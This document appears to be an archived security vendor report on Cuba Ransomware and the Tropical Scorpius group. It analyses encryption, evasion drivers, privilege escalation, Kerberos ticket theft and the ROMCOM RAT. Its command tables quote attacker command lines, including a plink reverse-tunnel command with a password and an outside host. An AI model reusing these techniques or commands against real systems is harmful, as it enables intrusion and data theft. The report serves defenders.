{ "id": "ca7bd241-7439-4ed6-96c6-325c108215fa", "created_at": "2026-04-06T00:16:43.068321Z", "updated_at": "2026-04-10T03:28:28.136631Z", "deleted_at": null, "sha1_hash": "e6f76326307511f14dd12cd4e709a376bf191b6e", "title": "Novel News on Cuba Ransomware: Greetings From Tropical Scorpius", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 12432778, "plain_text": "Novel News on Cuba Ransomware: Greetings From Tropical\r\nScorpius\r\nBy Anthony Galiette, Daniel Bunce, Doel Santos, Shawn Westfall\r\nPublished: 2022-08-09 · Archived: 2026-04-05 23:19:36 UTC\r\nExecutive Summary\r\nBeginning in early May 2022, Unit 42 observed a threat actor deploying Cuba Ransomware using novel tools and\r\ntechniques. Using our naming schema, Unit 42 tracks the threat actor as Tropical Scorpius.\r\nHere, we start with an overview of the ransomware and focus on an evolution of behavior observed leading up to\r\ndeployment of Cuba Ransomware. While this behavior was consistent for over a year, Unit 42 has observed some\r\nrecent changes. This includes providing an overview of the ransomware’s functionality and algorithms, as well as\r\ncovering the technical details of the tactics, techniques and procedures (TTPs) used by Tropical Scorpius.\r\nSpecifically, this involves:\r\nA new malware family that Unit 42 tracks as ROMCOM RAT.\r\nA weaponized local privilege escalation exploit to SYSTEM.\r\nA new Kerberos tool that Unit 42 tracks as KerberCache.\r\nA kernel driver for targeting security products.\r\nIdentifying the use of the ZeroLogon hacktool.\r\nPalo Alto Networks customers receive protections from the threats described in this blog through our Cloud-Delivered Security Services, namely Advanced Threat Prevention. Customers also receive protections from Cortex\r\nXDR and WildFire malware analysis.\r\nIf you think you may have been impacted by a cyber incident, the Unit 42 Incident Response team is available\r\n24/7/365. You can also take preventative steps by requesting any of our cyber risk management services.\r\nFull visualization of the techniques observed, relevant courses of action and indicators of compromise (IoCs)\r\nrelated to this report can be found in the Unit 42 ATOM viewer.\r\nRelated Unit 42 Topics Ransomware\r\nNames for threat actor group deploying Cuba Ransomware Tropical Scorpius, UNC2596\r\nTropical Scorpius Overview: How Cuba Ransomware Has Been Deployed\r\nThe Cuba Ransomware family first surfaced in December 2019. The threat actors behind this ransomware family\r\nhave since changed their tactics and tooling to become a more prevalent threat in 2022. This ransomware has\r\nhistorically been distributed through Hancitor, which is usually delivered through malicious attachments. Tropical\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 1 of 32\n\nScorpius has also been observed exploiting vulnerabilities in Microsoft Exchange Server, including ProxyShell\r\nand ProxyLogon.\r\nThis ransomware group uses double extortion alongside a leak site that exposes organizations that have allegedly\r\nbeen compromised (Figures 1a and 1b). That said, this group didn’t have a leak site when first observed in 2019;\r\nwe suspect the inspiration for adding one came from other ransomware groups such as Maze and REvil. The Cuba\r\nRansomware leak site also includes a paid section where the threat actors share leaks that were sold to an\r\ninterested party.\r\nFigure 1a. A screenshot from the leak site used by Cuba Ransomware, focused on the content the\r\ngroup makes freely available.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 2 of 32\n\nFigure 1b. A screenshot of the section of the Cuba Ransomware group’s leak site where data is\r\noffered for sale.\r\nTropical Scorpius Victimology\r\nThe most recent Unit 42 Ransomware Threat Report includes observations of Cuba Ransomware impacting 33\r\norganizations. As of July 2022, Tropical Scorpius has used Cuba Ransomware to impact 27 additional\r\norganizations across multiple vectors, such as Professional and Legal Services, State and Local Government,\r\nManufacturing, Transportation and Logistics, Wholesale and Retail, Real Estate, Financial Services, Health Care,\r\nHigh Technology, Utilities and Energy, Construction, and Education. A total of 60 organizations were exposed by\r\nthis ransomware gang on its leak site since the group first surfaced in 2019.\r\nWe suspect the number of victims is larger than the leak site shows since ransomware operators usually don’t\r\nrelease the data publicly if the victim pays the ransom. That said, the FBI says the Cuba Ransomware gang made\r\nat least $43.9 million from ransom payments and has demanded at least $74 million.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 3 of 32\n\nFigure 2. Organizations appearing on the Cuba Ransomware leak site, distributed by industry.\r\nWe observed that this ransomware gang’s leak site does not include as global a distribution of targeted\r\norganizations as other ransomware gangs operating right now. While leak sites don’t reflect the actual number of\r\nvictims impacted by this ransomware group, they still give us a general idea of a group’s targets and objectives.\r\nWe noticed that out of the 60 victims listed on the Cuba Ransomware leak site, 40 were located in the United\r\nStates – 66% of the total number of allegedly breached organizations. By contrast, only about 30% of the\r\nallegedly breached organizations on the LockBit leak site are located in the U.S.\r\nFigure 3. Geographic distribution of organizations targeted by Cuba Ransomware, according to the\r\ngroup’s leak site.\r\nIndustrial Spy and Tropical Scorpius\r\nIn May 2022, BleepingComputer reported that the marketplace Industrial Spy was moving into the ransomware\r\nbusiness. After emerging in April 2022, Industrial Spy became known as a site where threat actors can sign up to\r\nbuy stolen data from breached companies. The extension into ransomware, while a related type of malicious\r\nactivity, also appears to have a connection to Tropical Scorpius.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 4 of 32\n\nFigure 4. Industrial Spy landing page.\r\nBleepingComputer reports that the ransom note used by Industrial Spy ransomware bears substantial resemblance\r\nto a Cuba ransom note, with both notes containing the exact same contact information. It’s worth mentioning that\r\nransomware groups usually copy ransom notes from other groups for their own samples, but we believe there is\r\nmore to this relationship.\r\nUnit 42 observed a Cuba Ransomware payload used to encrypt the files on a compromised system, appending the\r\n.cuba extension to the files – but then observed that the exfiltrated data was posted for sale on the Industrial Spy\r\nmarketplace.\r\nWe are still unsure why the Tropical Scorpius threat actors decided to leverage the Industrial Spy marketplace\r\nrather than their own leak site; however, due to the findings published by BleepingComputer and this curious\r\nincident, we believe there is more involvement between the two than originally thought.\r\nRansomware Functionality\r\nWhile it is clear the Tropical Scorpius threat actors are constantly developing and updating their toolkit, the core\r\nCuba Ransomware payload has remained roughly the same since its discovery in 2019. The cryptographic\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 5 of 32\n\nalgorithms are still taken from WolfSSL’s open source repository, specifically ChaCha for file encryption and RSA\r\nfor key encryption.\r\nFigure 5. Code overlap between Cuba Ransomware and WolfSSL’s RSA encrypt functionality.\r\nSimilarly to most ransomware families, Cuba Ransomware encrypts files differently depending on their size. If the\r\nfile is less than 0x200000 bytes in length, the entire file is encrypted. If not, Cuba Ransomware encrypts the files\r\nin chunks of 0x100000 bytes, with the break in between the encrypted chunks differing based on the overall size.\r\nFor example, a file with a size between 0x200000 bytes and 0xA00000 bytes will be modified in blocks of\r\n0x400000 bytes until the file’s end.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 6 of 32\n\nFigure 6. Determination of chunk spacing prior to file encryption.\r\nFile Size Chunk Size Chunk Spacing\r\nLess than 0x200000  Entire Size N/A\r\nBetween 0x200000 \u0026 0xA00000 0x100000  0x400000\r\nBetween 0xA00000 \u0026 0x3200000 0x100000  0x800000\r\nBetween 0x3200000 \u0026 0xC800000 0x100000  0x1000000\r\nBetween 0xC800000 \u0026 0x280000000 0x100000  0xC800000\r\nGreater than 0x280000000 0x100000  0x1F400000\r\nTable 1. Chunk spacing based on file sizes within Cuba Ransomware.\r\nEach encrypted file is also prepended with an initial 1024-byte header, containing the magic value FIDEL.CA\r\n(likely in reference to Fidel Castro, following the Cuba theme), followed by an RSA-4096 encrypted block\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 7 of 32\n\ncontaining the file-specific ChaCha key and nonce. After successfully encrypting a file, the extension .cuba is\r\nappended to the filename.\r\nFigure 7. FIDEL.CA magic value followed by encrypted RSA blob.\r\nAs discussed by Trend Micro, the developers of Cuba Ransomware have built onto the list of targeted processes\r\nand services that will be terminated on runtime, as well as increasing the number of directories and extensions to\r\navoid encrypting.\r\nTargeted processes and services:\r\nMySQL\r\nMySQL82SQLSERVERAGENT\r\nMSSQLSERVER\r\nSQLWriter\r\nSQLTELEMETRY\r\nMSDTC\r\nSQLBrowser\r\nsqlagent.exe\r\nsqlservr.exe\r\nsqlwriter.exe\r\nsqlceip.exe\r\nmsdtc.exe\r\nsqlbrowser.exe\r\nvmcompute\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 8 of 32\n\nvmms\r\nvmwp.exe\r\nvmsp.exe\r\noutlook.exe\r\nMSExchangeUMCR\r\nMSExchangeUM\r\nMSExchangeTransportLogSearch\r\nMSExchangeTransport\r\nMSExchangeThrottling\r\nMSExchangeSubmission\r\nMSExchangeServiceHost\r\nMSExchangeRPC\r\nMSExchangeRepl\r\nMSExchangePOP3BE\r\nMSExchangePop3\r\nMSExchangeNotificationsBroker\r\nMSExchangeMailboxReplication\r\nMSExchangeMailboxAssistants\r\nMSExchangeIS\r\nMSExchangeIMAP4BE\r\nMSExchangeImap4\r\nMSExchangeHMRecovery\r\nMSExchangeHM\r\nMSExchangeFrontEndTransport\r\nMSExchangeFastSearch\r\nMSExchangeEdgeSync\r\nMSExchangeDiagnostics\r\nMSExchangeDelivery\r\nMSExchangeDagMgmt\r\nMSExchangeCompliance\r\nMSExchangeAntispamUpdate\r\nMicrosoft.Exchange.Store.Worker.exe\r\nAvoided directories:\r\n\\windows\\\r\n\\program files\\microsoft office\\\r\n\\program files (x86)\\microsoft office\\\r\n\\program files\\avs\\\r\n\\program files (x86)\\avs\\\r\n\\$recycle.bin\\\r\n\\boot\\\r\n\\recovery\\\r\n\\system volume information\\\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 9 of 32\n\n\\msocache\\\r\n\\users\\all users\\\r\n\\users\\default user\\\r\n\\users\\default\\\r\n\\temp\\\r\n\\inetcache\\\r\n\\google\\\r\nAvoided extensions:\r\n.exe\r\n.dll\r\n.sys\r\n.ini\r\n.lnk\r\n.vbm\r\n.cuba\r\nAnother major update can be found within the ransom note dropped by the ransomware; rather than rely solely on\r\ntheir Tor site, they are also offering communication via TOX, which is slowly becoming more popular among\r\nransomware groups due to its secure messaging functionality.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 10 of 32\n\nFigure 8. Ransom note dropped by Cuba Ransomware group.\r\nDefense Evasion\r\nUnit 42 observed Tropical Scorpius prior to the deployment of ransomware, using some interesting tools and\r\ntechniques to evade detection and move around in the compromised environment.\r\nTropical Scorpius leveraged a dropper that writes a kernel driver to the file system called ApcHelper.sys. This\r\ntargets and terminates security products. The dropper was not signed, however, the kernel driver was signed using\r\nthe certificate found in the LAPSUS NVIDIA leak.\r\nFigure 9. Kernel driver digital signature.\r\nUpon executing the kernel driver dropper/loader, the kernel dropper uses multiple Windows APIs for finding the\r\nresource section and loading the resource type name called Driver. This is an embedded PE file and is the driver\r\nthat will ultimately be written to the file system in subsequent API calls.\r\nFigure 10. Kernel dropper resource section.\r\nAfter the kernel driver drops onto the file system, the loader will first run a deletion command argument via\r\ncmd.exe for the file path.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 11 of 32\n\nAfter this, it will create a new service using cmd.exe and run the argument below to set up a service for the kernel\r\ndriver.\r\nThen the loader copies the kernel driver responsible for terminating security products onto the file system.\r\nThe core functionality of the kernel driver dropped and loaded is to resolve additional kernel APIs for performing\r\nfunctionality and targeting a list of security products for termination.\r\nThe additional APIs are resolved using a string constant for the desired API name; each Windows API below is\r\nused in a function call to MmGetSystemRoutineAddress for returning a pointer to the function. Below is a list of\r\nadditional kernel APIs resolved that were found within the sample.\r\nFigure 11. Kernel driver runtime APIs.\r\nThe list of security products targeted overlaps with the list of targets previously observed in the tool called\r\n“BURNTCIGAR” as discussed by Mandiant. This particular kernel driver is a variant of what Mandiant observed.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 12 of 32\n\nFigure 12. Security products targeted.\r\nAfter the additional APIs are resolved, the process of targeting security products begins (products targeted are in\r\nFigure 12 above). A do-while loop is set up (loop is shown in Figure 13 below) with the objective of checking the\r\nprocesses running on the system to see if they match an item from the security products targeted. This naming\r\ncheck is performed by looking up each ThreadID and calling the function PsLookupThreadByThreadId, which\r\nwill be used to find a pointer to the ETHREAD structure of the thread. The ETHREAD structure is a kernel object\r\nmaintaining various references to important process/thread structures and objects needed by the operating system\r\nfor tasking and execution by the CPU. The pointer to ETHREAD that is returned is used in the function\r\nPsIsThreadTerminating to make sure a thread is not terminating.\r\nThen if a thread object exists, to find the process the thread belongs to, the function PsGetThreadProcess is used\r\nand the returned value is PEPROCESS. PEPROCESS is a kernel object representation of a process object which\r\nmaintains pointers to where process-related information is stored. If PEPROCESS does exist for the associated\r\nthread, the ImageFileName offset is then assigned to a variable in the instance of the decompiled output; this is the\r\nvariable named “v3” in Figure 13. The variable “v3” will then have the process image file name for the current\r\nthread/process in the loop, which could be any active process on a computer system.\r\nThe next part of performing the name check is the inner if-then statement that uses two parameters in the strstr\r\nfunction. The first parameter is the process image filename from the PEPROCESS structure’s ImageFileName.\r\nThe second parameter is a substring search of the security product’s name to compare against the first parameter.\r\n(For example, does the name Sophos exist in the ImageFileName process name string?)\r\nIf there is a match, the next function, called sub_140001BE0 (shown being called in Figure 13 below), will check\r\nif the status code of the thread is set to status pending. If this evaluates as true, then a subroutine will be called\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 13 of 32\n\nusing ZwTerminateProcess for termination. The thread object will be dereferenced and the loop will continue to\r\nthe next thread to start evaluating again for termination.\r\nFigure 13. Example of kernel driver decompiled.\r\nThe change of tactics by Tropical Scorpius is to make use of the expired legitimate NVIDIA certificate, as well as\r\nuse of their own driver targeting security products for termination. This is a noteworthy change compared to\r\npublicly observed exploitation of an undocumented IOCTL (Input/Output Control system calls) in previous\r\nversions of the vulnerable BURNTCIGAR driver.\r\nLocal Privilege Escalation\r\nThe local privilege escalation tool leveraged by Tropical Scorpius was initially downloaded from the web hosting\r\nplatform tmpfiles[.]org by using PowerShell’s Invoke-WebRequest.\r\nUnit 42 observed the actor leverage a binary that abused CVE-2022-24521, a vulnerability in the Common Log\r\nFile System (CLFS). The exploit abused a logic bug in CLFS.sys, specifically in the\r\nCClfsBaseFilePersisted::LoadContainerQ() function. Malformed BLF files were used to corrupt the pContainer\r\nfield of a container context object with a user-mode address to gain code execution. The code execution was used\r\nto steal the System token and elevate privileges. A detailed write-up of this vulnerability and the exploitation\r\nstrategy was provided by Sergey Kornienko of PixiePoint Security on April 25, 2022.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 14 of 32\n\nThe Tropical Scorpius threat actor likely used this post as a guide to build the exploit since the exploitation\r\nstrategy used is identical to what Sergey described, including the pipe attributes heap exploitation method to spray\r\nthe heap.\r\nThis technique was covered in detail by Corentin Bayet and Paul Fariello of Synactiv at the Symposium on\r\nInformation and Communications Technology Security (SSTIC) in 2020.\r\nTicket to Lateral Movement\r\nThe Tropical Scorpius threat actor leveraged various tools for the initial system reconnaissance. ADFind and Net\r\nScan were downloaded from the web hosting platform tmpfiles[.]org by using PowerShell’s Invoke-WebRequest.\r\nBoth tools were dropped onto the same system with shortened names to obscure their purpose.\r\nCredential preparation and collection on lower-privilege systems was performed using a PowerShell-based script,\r\nGetUserSPNs.ps1. This particular script was observed on three different systems, where it identified user accounts\r\nbeing used as service accounts. The threat actor used this process to pinpoint accounts worth targeting for their\r\nassociated Active Directory Kerberos ticket, in order to collect and crack the Kerberos ticket offline via the\r\ntechnique called Kerberoasting.\r\nAdditional activity related to credential theft was observed approximately one week after the use of\r\nGetUserSPNs.ps1, with the observation of Mimikatz on a user's workstation being written into the user’s\r\ndocument folder as a zipped file. Mimikatz is a well-known credential theft tool that contains various options for\r\ntargeting parts of the operating system where credentials can potentially be found.\r\nAround the time that Mimikatz was observed, a custom hacktool was observed on another workstation. This tool,\r\nintended for extracting cached Kerberos tickets from a host’s LSASS memory, was dropped into a user’s\r\ndocuments folder.\r\nUnit 42 is naming the Kerberos tool used by Tropical Scorpius in terms of its overall objective: KerberCache. A\r\nscreenshot of the tool’s output was taken, displaying the parsed data the tool generates (Figure 14).\r\nFigure 14. KerberCache ticket extraction example.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 15 of 32\n\nUnder the hood, KerberCache will call the API LsaConnectUntrusted to get a handle used for subsequent calls.\r\nFollowing the returned handle, the call to LsaLookupAuthenticationPackage is then given the package named\r\nKerberos along with the handle from the previous API call to LsaConnectUntrusted. If the function succeeds, it\r\nwill call the API LsaCallAuthenticationPackage. Below (Figure 15) is a snippet of the function’s flow once called\r\nand the decompiled formatting and parsing takes place.\r\nFigure 15. Ticket parsing decompiled example.\r\nUpon successful retrieval of cached Kerberos tickets, the ticket will be passed to a function for base64-encoding\r\nthe data and will be written to the current working directory in which the tool was executed. The naming\r\nconvention output for the tool can be broken into the following sections: [user@servername]_[encryption_type].\r\n[ticket_number].kirbi. The actual ticket naming convention, when written to the file system, appears as the\r\nfollowing example output: krbtgt@CORP.INTERNAL_18.0.kirbi.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 16 of 32\n\nFigure 16. Ticket encoding decompiled example.\r\nTo Domain Admin\r\nThe Domain Admin tool leveraged by Tropical Scorpius was initially downloaded from the web hosting platform\r\ntmpfiles[.]org by using PowerShell’s Invoke-WebRequest. The sample was packed using the Anti-VM features of\r\nThemida, a well-known commercial packing tool. It was also masquerading as the filename Filezilla.\r\nUpon execution, if running in a virtualized environment, the packer will display the following message:\r\nFigure 17. Themida Anti-VM example.\r\nThe unique commands associated with the hacktool provide high confidence Zero.exe is ZeroLogon hacktool. The\r\nZeroLogon hacktool is used to abuse CVE-2020-1472 to gain Domain Administrator (DA) privileges by\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 17 of 32\n\nrequesting an NTLM hash from the domain controller.\r\nFigure 18. ZeroLogon hacktool packed example.\r\nIt has been noted publicly that the ZeroLogon hacktool has gained popularity among other malware families as\r\npart of their attack chain in the crimeware space with overlap on intrusions related to Qbot and Hancitor.\r\nCommand and Control\r\nAlongside the aforementioned tools, Unit 42 also discovered a custom remote access Trojan/backdoor containing\r\na unique command and control (C2) protocol. Based on the strings within the binary as well as the functionality,\r\nwe’ve opted to name it ROMCOM RAT.\r\nROMCOM RAT can be executed through the use of one of its two exports:\r\nServiceMain\r\nstartWorker\r\nBoth exports lead to the execution of the same function; however, the difference is the string passed as a\r\nparameter: ServiceMain passes the string _inet, while startWorker passes the string _file. Based on this string\r\nalone, the flow of execution within the sample is completely different, with ServiceMain causing the sample to\r\nbeacon out to its C2 server, and startWorker resulting in the sample opening a backdoor on the system and waiting\r\nfor connections.\r\nServiceMain Export\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 18 of 32\n\nUpon execution of the ServiceMain export, ROMCOM will execute the following command line:\r\nC:\\\\Windows\\\\System32\\\\rundll32.exe\r\nC:\\\\Windows\\\\System32\\\\comDll.dll,startWorker\r\nThis will lead to the execution of the startWorker export, meaning both exports will be active on a machine,\r\npresuming ROMCOM was initially executed through a service.\r\nFigure 19. Execution of ROMCOM sample through rundll32.exe with startWorker argument.\r\nFrom there, ROMCOM will gather system and user information, and attempt to send it to a hardcoded C2 server\r\nvia the WinHTTP API. If this is successful, the response is parsed and dealt with accordingly.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 19 of 32\n\nFigure 20. ICMP capabilities offered within ROMCOM.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 20 of 32\n\nFigure 21. Command handling of the packet received from C2.\r\nIf the connection fails, ROMCOM attempts to connect to and communicate with the C2 server using ICMP\r\nrequests. Using Windows API functions such as IcmpCreateFile() and IcmpSendEcho(), it will attempt to resend\r\nthe system and user information to the server until a response is received. Once a response is received, it is parsed\r\nin the same way the HTTP response will be parsed.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 21 of 32\n\nFigure 22. ICMP request functionality.\r\nIf the fourth byte of the response is equal to 9, ROMCOM will sleep for 120,000 milliseconds. If the fourth byte is\r\nset to 5, the response will contain a size for followup data, and so memory is allocated before a second request is\r\nmade to the C2, using either HTTP or ICMP depending on the last protocol in use.\r\nThe received data from this second request is then passed into a function that first connects to the local address\r\n127.0.0[.]3 over a port between 5555 and 5600, and then sends the C2 received data. The function then returns,\r\nand then ROMCOM binds to 127.0.0[.]2:5555, where it will wait for a connection and forward any data received\r\nfrom that connection to its C2 server.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 22 of 32\n\nFigure 23. Connecting to local socket server hosted by ROMCOM startWorker process.\r\nThis leads nicely into a discussion of the\r\nstartWorker\r\nexport.\r\nstartWorker Export\r\nThe startWorker export passes the string _file to the main function of ROMCOM, which results in the code\r\nexecuted by the ServiceMain export being skipped. Instead, startWorker begins by opening a socket object and\r\nattempting to bind to the IP 127.0.0[.]3, and the port 5555. However, if the port is already in use, ROMCOM will\r\nincrement the port value and attempt to bind once again. This loop continues until ROMCOM has bound to an\r\nunused port, or until the port value reaches 5600, at which point it is set to 5554 and the loop restarts.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 23 of 32\n\nFigure 24. Setting up local socket server.\r\nOnce ROMCOM has successfully bound to a port, it begins listening for an incoming connection – this will be\r\nfulfilled by the process that executed the\r\nServiceMain\r\nexport. When an incoming connection is received, a thread will be spawned that will handle any requests from the\r\nconnected client.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 24 of 32\n\nFigure 25. Command handler.\r\nTable 2 can be seen below, containing the list of accepted commands and their purpose.\r\nCommand\r\nValue\r\nPurpose\r\n1 Return connected drive information\r\n2 Return file listings for specified directory\r\n3 Start up a reverse shell under the name svchelper.exe within the %ProgramData% folder\r\n4 Upload data to C2 as ZIP file, using IShellDispatch to copy files\r\n5 Download data and write to worker.txt in the %ProgramData% folder\r\n6 Delete a specified file\r\n7 Delete a specified directory\r\n8 Spawn a process with PID Spoofing\r\n9\r\nOnly handled by ServiceMain, received from C2 server and instructs the process to sleep\r\nfor 120,000 ms\r\n10 Iterate through running processes and gather process IDs\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 25 of 32\n\nTable 2. Supported backdoor commands and their functionality.\r\nEssentially, this particular execution structure results in the ROMCOM sample running as a service receiving\r\ncommands via HTTP/ICMP requests to and from its C2 servers, before passing those commands on to the\r\nROMCOM sample that was executed through rundll32.exe. The commands are executed, with the results passed\r\nback to the service-executed ROMCOM payload. Finally, the results are posted to the C2 server, either via an\r\nHTTP or ICMP request.\r\nROMCOM 2.0\r\nIt appears that ROMCOM is under active development, as we were able to discover a similar sample uploaded to\r\nVirusTotal (VT) on June 20, 2022, that was communicating to the same C2 server.\r\nThe original sample was dated April 10, 2022, while this sample had a file header timestamp of May 28, 2022,\r\nand was ~400 kb larger. It shared the same startWorker and ServiceMain exports; however, it also contained a\r\nthird export denoted as startInet. It is important to note the increase in debug strings found within the sample,\r\nwhich could indicate that the sample was caught by antivirus software prior to development completion; this\r\ntheory is further supported by the VT uploader ID (22b3c7b0) having uploaded millions of files in the past, which\r\nrules out any one individual uploading it themselves.\r\nWithin this version, ServiceMain will execute the ROMCOM 2.0 sample twice, initially executing the startInet\r\nexport, and then proceeding to execute the startWorker export. However, rather than simply calling\r\nCreateProcessA like the original ROMCOM sample, the developers have placed a larger focus on using COM\r\nobjects for execution.\r\nFigure 26. Execution of startInet and startWorker exports.\r\nEach process is spawned as a task on the system, using a variety of COM interfaces offered by the Task Scheduler.\r\nROMCOM 2.0 will first get the tasks root folder by calling ITaskService-\u003eGetFolder. It then deletes any existing\r\ntasks with the same name as the task that will be created using ITaskFolder-\u003eDeleteTask.\r\nTask Name Export\r\ntask7 startInet\r\ntask6 startWorker\r\ntask1 startWorker – if not already running when startInet is executing\r\nTable 3. Names of tasks registered through the Task Scheduler COM interfaces.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 26 of 32\n\nAn empty task is created with ITaskService-\u003eNewTask, and the security principal is then modified using\r\nIPrincipal-\u003eput_Id to set the identifier as NT AUTHORITY\\\\SYSTEM, using IPrincipal-\u003eLogonType to set the\r\nlogon type to TASK_LOGON_INTERACTIVE_TOKEN, and using IPrincipal-\u003eput_RunLevel to set the run level\r\nas TASK_RUNLEVEL_HIGHEST.\r\nFigure 27. Task creation with SYSTEM privileges.\r\nA delay of 0 seconds is set for the task, using IRegistrationTrigger-\u003ePutDelay, indicated by the string PT0S,\r\nresulting in the task executing immediately upon creation.\r\nFigure 28. Creation of task trigger, with delay set to 0 seconds.\r\nFinally, an action is set for the task, with the action path set to rundll32.exe and the argument set to\r\nC:\\\\Windows\\\\system32\\\\mskms.dll,ARGUMENT, where ARGUMENT is either startWorker or startInet,\r\ndepending on the export passed.\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 27 of 32\n\nFigure 29. Creation of task action, resulting in rundll32.exe executing mskms.dll.\r\nOnce registered, the task is triggered, which results in execution of the ROMCOM 2.0 main functionality. This\r\nfollows the same structure as the original sample, with the startInet process reaching out to a hardcoded C2 server\r\nand passing any responses to the startWorker process to handle accordingly. The developers have also expanded\r\non the list of handled commands, adding 10 more alongside the existing 10 commands. These include\r\ndownloading payloads specifically designed to take single or multiple screenshots of a system, as well as\r\nextracting a list of all installed programs to send back to the C2 (see the SCREENSHOOTER string reference\r\nshown in Figure 30).\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 28 of 32\n\nFigure 30. Downloading the described SCREENSHOOTER payload.\r\nCommand\r\nValue\r\nPurpose\r\n1 Return connected drive information\r\n2 Return file listings for specified directory\r\n3 Start up a reverse shell under the name winconhost.exe within the %TMP% folder\r\n4 Upload data to C2 as ZIP file, using IShellDispatch to copy files\r\n5 Download data and write to worker.txt in the %TMP% folder\r\n6 Delete a specified file\r\n7 Delete a specified directory\r\n8 Spawn a process with PID Spoofing\r\n9\r\nOnly handled by startInet, received from C2 server and instructs the process to sleep for a\r\nrandom amount of time\r\n10 Get Process IDs of specific processes\r\n12\r\nExecute rundll32.exe %TMP%\\\\PhotoDirector.dll,startWorker single and upload\r\n%TMP%\\\\PhotoDirector.zip to C2 server (likely used to take a single screenshot)\r\n13 Execute rundll32.exe %TMP%\\\\PhotoDirector.dll,startWorker\r\n14 Upload %TMP%\\\\PhotoDirector.zip to C2 server \r\n15 Retrieve all running processes and process IDs \r\n16\r\nGet list of installed software by querying\r\nSOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall or\r\nSOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\r\n18 Write received file SCREENSHOOTER to %TMP%\\\\PhotoDirector.dll\r\n19\r\nCreate %TMP%\\\\BrowserData folder, and write received file to\r\n%TMP%\\\\BrowserData\\\\explorer.exe before executing\r\n20 Write received file to and spawn %TMP%\\\\win_sshd.exe, described as FreeSSHd\r\n21\r\nReferences plink.exe -ssh -pw AeM8soequ@ooNg -R 9999:4444\r\nponcho@CombinedResidency.org\\n, however appears to only execute C:\\\\Program Files\r\n(x86)\\\\freeSSHd\\\\FreeSSHDService.exe\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 29 of 32\n\n22 Terminate svcnet.exe, FreeSSHDService.exe, and plink.exe\r\nTable 4. ROMCOM 2.0 supported commands.\r\nProtections and Mitigations\r\nWe recommend leveraging the indicators of compromise (IoCs) below to identify any impacts to your\r\norganization.\r\nPalo Alto Networks detects and prevents Cuba Ransomware and Tropical Scorpius activity in the following ways:\r\nCortex XDR with\r\nDetection for all indicators for Cuba Ransomware and related activity.\r\nAnti-Ransomware module to detect Cuba Ransomware encryption behaviors on Windows systems.\r\nLocal Analysis detection for Cuba Ransomware and ROMCOM RAT binaries on Windows\r\nenvironments.\r\nBehavioral Threat Protection rule prevents execution of related indicators.\r\nWildFire: All known samples are identified as malware.\r\nThreat Prevention provides protection against Tropical Scorpius infrastructure.\r\nAdvanced URL Filtering and DNS Security identify domains associated with this group as malicious.\r\nIndicators of compromise and associated TTPs can be found in the Tropical Scorpius ATOM.\r\nIf you think you may have been impacted or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nIf you have cyber insurance, you can request Unit 42 by name. You can also take preventative steps by requesting\r\nany of our cyber risk management services.\r\nConclusion\r\nTropical Scorpius remains an active threat. The group’s activity makes it clear that an approach to tradecraft using\r\na hybrid of more nuanced tools focusing on low-level Windows internals for defense evasion and local privilege\r\nescalation can be highly effective during an intrusion.\r\nCoupled with a splash of well-adopted and successful crimeware techniques, this presents unique challenges to\r\ndefenders.\r\nUnit 42 recommends that defenders have advanced logging capabilities deployed and configured properly such as\r\nSysmon, Windows Command Line logging and PowerShell logging – ideally forwarding to a Security Information\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 30 of 32\n\nand Event Management tool (SIEM) to create queries and detection opportunities. Keep computer systems\r\npatched and up to date wherever possible to reduce attack surface 